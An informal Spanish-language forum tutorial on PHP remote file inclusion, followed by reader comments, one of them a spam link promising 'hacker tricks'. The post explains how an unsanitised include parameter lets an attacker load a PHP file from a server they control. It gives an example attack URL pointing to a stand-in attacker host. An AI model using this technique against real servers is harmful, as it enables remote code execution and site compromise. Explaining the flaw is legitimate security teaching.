saludos aki tenemos la septima aportacion…
ha pasado mucho tiempo desde la sexta (6), problemas personales, estudios, etc
pero lo prometido es deuda, i aki teneis el articulo sobre php file inclusion…
php es un lenguage de programacion web k permite no solo visualizar datos, realizar calculos etc, como los lenguages web clasicos, sino k permite tmb ejecutar comandos en el servidor (comandos shell), modificar archivos, etc …
detalles previos:
1. un servidor para poder servir paginas php debe tener el php instalado i el servidor web configurado para trabajar con el
2. php es un lenguage parecido a c, por lo cual, las consecuencias de en una situacion especial, poder llegar a introducir un archivo php en el contexto del servidor es comparable con poder compilar i ejecutar cualkier codigo en c en el contexto del servidor (esto tecnicamnte no es asi, pero lo asumiremos para k os hagais a la idea)
3. lo k trataremos aki se refiere a sistemas unix, aunke php no tiene ningun problema de incomptabilidades con windows, podria aplicarse a windows con las consecuentes adaptaciones, pero el 99% de servers son unix o derviados (vease linux) asi k trataremos este ultimo.
4. en los sistemas unix/linux (los tratados aki) el php es habitual i en el 99% de los casos se cumple, k el php tenga permisos de nobody, pero en ocasiones tiene permisos del usuario web (el k la cuelga etc..), en la practica nos da igual los permisos k tenga php.
5. php tiene una opcion llamada safemode, si esa opcion se encuentra activada (por defecto: no) el servidor no sera vulnerable.
empezemos…el php tiene una funcion llamada include la cual sirve para pasarle la ejecucion a otro script php, de forma k si tenemos un archivo php llamado a.php i otro llamado b.php podriamos hacer un include en a.php k apunte a b.php i cuando un usuario hiciese:
www.example.com/a.php veria b.php, ia k ha sido incluido.
bien, esto nos lleva a pensar en esas paginas k todos hemos visto alguna vez:
www.example.com/index.php?seccion=descargas
bien, lo k ocurre aki es k index.php recive a traves de la url la variable seccion, luego si la pagina es vulnerable (ahora entendereis por k) index.php cojera descargas i le añadira al final .php i lo incluira, haciendo asi el include a:
descargas.php
k ocurrira si nos creamos un hosting en almacenweb.com o algun otro servicio de hostings gratuitos i subimos un archivo llamado: hack.php i luego vamos a la pagina vulnerable i hacemos:
www.example.com/index.php?seccion=http://www.paginahacker.com/hack
cojera, le añadira a la variable seccion al final un .php i hara un include, incluyendo asi:
http://www.paginahacker.com/hack.php
bien, esto nos lleva a pensar k podemos ejecutar cualkier archivo php en el servidor, i es cierto, este agujero es critico.
existen comandos php para modifcar archivos (siempre k tengamos permisos) ejecutar comandos etc…
nota: muchos lammers creidos, niñatos i gente abusrda i molesta solo conocen esta tecnica i se dedican a decir k son hackers, espero k nadie aprenda esto i solo por poder hackear servidor asi, se kede estancado.
pues kiero saber si hai qe krear primero la pagina web del hack cn el qe keremos modificar datos en la pagina vulnerable.. o solo con poner el nombre qe dice asi keda kreada? no entendi muii bien lo qe explicaste..
podrias ser un poko mas expecifico =D
bueno gracias, nos vemos
bueno metanse a http://www.xat.com/vennnn hay trucvos hacker
este culiado no sabe nada de hacker no le des bola
Bueno pues simplemente no entres